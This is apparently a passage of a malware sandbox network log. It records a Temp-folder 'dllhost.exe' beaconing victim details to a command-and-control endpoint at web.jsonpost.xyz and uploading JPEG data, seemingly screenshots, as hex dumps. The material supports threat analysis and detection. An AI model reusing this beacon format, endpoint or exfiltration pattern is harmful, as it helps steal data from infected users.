                                                                                Nov 29, 2024 01:52:31.640953064 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.44977472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:32.193599939 CET196OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----2da2ec123a554cc4f0e9e4f45f265c8c
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 102787
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:32.193667889 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 32 64 61 32 65 63 31 32 33 61 35 35 34 63 63 34 66 30 65 39 65 34 66 34 35 66 32 36 35 63 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------2da2ec123a554cc4f0e9e4f45f265c8cContent-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:32.193718910 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:32.193742990 CET1236OUTData Raw: 5f e9 da 3d d5 a2 cb 35 cc 37 71 ea 1a 8a 32 95 cc b1 aa a0 50 7b e4 2b 3e 47 43 27 d6 99 67 0e 8f a3 5c e9 97 31 ea 50 dc 41 0e a3 04 dc c1 28 99 23 0e 18 97 1b 76 e4 00 73 b5 9b 27 a5 6a 84 50 72 14 02 7b e2 99 e4 44 4e 4c 69 ff 00 7c 8a b8 e5
                                                                                Data Ascii: _=57q2P{+>GC'g\1PA(#vs'jPr{DNLi|eK7S=[ia3e:j/&o{3[F,[oIr[<9{uXcIxc}O=+dGQL_?Y(+5y9^Z6TStO0~\>LZ<
                                                                                Nov 29, 2024 01:52:32.313805103 CET1236OUTData Raw: 45 31 8d a2 97 a5 27 7a 43 13 1f 4a 4e d4 e3 c5 27 4a 06 27 7a 0f 3c f5 a2 8e 08 fe 74 0c 42 28 3e b4 13 9e 28 ed e9 40 08 47 e2 05 14 1e 3d e8 a0 61 8c 51 47 e3 46 4d 00 27 e6 69 3b f6 a5 39 cf 6a 39 a0 68 4a 4e b4 b8 e7 9a 4a 00 43 da 83 d6 97
                                                                                Data Ascii: E1'zCJN'J'z<tB(>(@G=aQGFM'i;9j9hJNJC!cHG4cuQ)A@QQ'qGCh4ZJJ_Q:3uNRRGN(<M>%)(#XGj^?)QKE%((RR@EP0Q@(
                                                                                Nov 29, 2024 01:52:32.313849926 CET4944OUTData Raw: ad a8 e2 a8 57 6d 52 9a 95 bb 34 ff 00 23 2a b8 6a f4 55 ea c1 c6 fd d3 5f 98 ca 4a 5a 2b 73 01 28 a5 fc 29 28 18 51 45 6a f8 6f c2 f7 de 28 fb 54 d1 de ad 95 ac 12 79 41 bc af 30 bb 01 93 c6 47 4c 8f ce b8 f1 b8 ea 78 48 a9 4d 37 7d 92 ff 00 83
                                                                                Data Ascii: WmR4#*jU_JZ+s()(QEjo(TyA0GLxHM7}dzy^S[19(+kenTWg/]b!K}%_TA4+83#n$[?r2 ">->M=S{-Z]O7z
                                                                                Nov 29, 2024 01:52:32.313910961 CET4944OUTData Raw: 52 f8 11 e0 d5 f8 d8 94 52 d2 11 cd 68 48 94 94 a4 50 68 1a 1b 8a 29 69 31 40 c4 a4 fa d3 8d 27 5a 00 4a 29 69 0d 03 13 19 a4 c5 3b bd 25 03 10 ff 00 9c 52 52 9a 4f e7 40 c0 83 41 a3 a5 1f ca 81 89 d7 8a 4a 5a 0f d6 80 1b d7 9e fe b4 62 97 bd 25
                                                                                Data Ascii: RRhHPh)i1@'ZJ)i;%RRO@AJZb%3RRi:RRP1;{HM/jOj~13(t@zQ~4{QEi<RvZq`>sI4GA@);hPP1A4w
                                                                                Nov 29, 2024 01:52:32.314012051 CET4944OUTData Raw: 52 ef 22 97 78 3f 78 66 8b 05 d9 05 18 a9 f6 a1 f6 a6 98 8f f0 90 68 b3 1d c8 b1 46 29 c5 48 ea 29 bd e9 14 14 94 b4 50 02 51 8a 28 a0 62 51 4a 69 28 01 38 a2 96 90 d0 31 28 a5 a4 a6 31 28 a5 a4 a0 02 93 de 96 92 80 0a d7 f0 cf fc 86 93 fd c6 fe
                                                                                Data Ascii: R"x?xfhF)H)PQ(bQJi(81(1(U[71_4N#/%M-{t?k;Xc$c81sV>uj7HFqZn.uU?INKTe61s--ZI:2}jji
                                                                                Nov 29, 2024 01:52:32.314121962 CET4944OUTData Raw: 55 96 04 93 ef a8 38 f5 a8 fe c7 07 fc f3 15 a1 bf 3c 32 83 48 52 36 e9 95 a9 74 d3 dd 16 aa 34 50 fb 1c 1f f3 cc 51 f6 38 3f e7 98 fc aa e1 81 bf 84 83 51 95 65 ea 0d 4f 24 7b 17 ed 1b ea 56 fb 14 1f f3 cc 52 7d 8e 0f f9 e6 3f 2a b3 49 47 24 7b
                                                                                Data Ascii: U8<2HR6t4PQ8?QeO${VR}?*IG${]by<V(rbP1UEVR}*7#=}?*IO=.<GbRQr<I8?{8<'b
                                                                                Nov 29, 2024 01:52:32.316433907 CET2472OUTData Raw: f0 41 72 c8 90 da 5a f9 4f 08 1f c2 e7 ca 5d c7 e8 cc 38 ac 3b ed 16 f3 50 6b 87 9e f1 03 4f 6c b6 ae b1 c4 a8 82 25 75 70 8a aa 00 50 0a 83 f2 81 fa 9a d4 06 f6 79 5a 5b d6 b3 96 66 7d ef 34 56 71 45 23 b7 ab 32 20 2d f8 9a d7 0f 85 c4 c6 ba 9c
                                                                                Data Ascii: ArZO]8;PkOl%upPyZ[f}4VqE#2 -wb9]:'EYo,bqs,Z5[B4%eDb>rNpkbn`hB;Y_jZ^]HHfFUC<zPRizZYn+FV]WMcF+j"%-?'X$
                                                                                Nov 29, 2024 01:52:32.433897018 CET2472OUTData Raw: e8 fc 3d a0 5a 4f 61 2e b5 ad 4a d1 69 91 36 c5 44 fb f3 bf f7 47 b7 f9 e3 15 f9 c6 2b 11 88 cc 31 1a eb d9 76 3f 78 c9 a8 e5 f9 5e 59 1a b4 be 16 93 72 ea df 9f cf a7 43 9c dd 49 ba bb 3f f8 4a 34 48 18 47 6d e1 5b 13 00 e0 79 e0 3b 9f c4 83 fd
                                                                                Data Ascii: =ZOa.Ji6DG+1v?x^YrCI?J4HGm[y;kwN"]?M![fOq1Z>oaQ%jLXnLd^]^>~;[5H]1T|ge*Cxrvw}QJ)hB^;Ry+$


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.44977572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:33.064846039 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.44977672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:33.238214016 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:33.238248110 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:33.238317013 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:33.238332987 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:33.358444929 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:33.358491898 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:33.358547926 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:33.358547926 CET1236OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:33.358565092 CET1236OUTData Raw: c8 f3 f3 aa 54 2b 61 e5 5a 2d 39 46 db 79 be bf a1 c8 d1 45 15 f5 07 c7 85 25 2d 14 01 bd e0 af f9 1b ec 3e b2 7f e8 b6 af 5e af 99 74 db 16 d5 35 3b 7b 24 9e 18 5e 77 d8 b2 4c 48 50 4f 4c 90 09 e4 f1 d3 bd 6d 45 e0 8d 55 f5 7d 47 4f 91 ed a0 3a
                                                                                Data Ascii: T+aZ-9FyE%->^t5;{$^wLHPOLmEU}GO:|~d"@'>Wr}]VXj*6@V.#T]IKY-gI-O~+=cj<_\L7Ir}X~uetzqiZ?32MAs+{0Oj6u#
                                                                                Nov 29, 2024 01:52:33.358645916 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:33.358771086 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.44977772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:34.530024052 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.44977872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:34.745754004 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:34.745831966 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:34.745906115 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:34.745925903 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:34.865923882 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:34.866080046 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:34.866095066 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:34.866229057 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:34.866266966 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:34.866326094 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:34.866420031 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.44977972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:35.951947927 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.44978072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:36.334525108 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----75fc820eeb92975bff3e841961ce7c5b
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98287
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:36.334578991 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 37 35 66 63 38 32 30 65 65 62 39 32 39 37 35 62 66 66 33 65 38 34 31 39 36 31 63 65 37 63 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------75fc820eeb92975bff3e841961ce7c5bContent-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:36.334667921 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:36.334692955 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:36.454667091 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:36.454745054 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:36.454868078 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
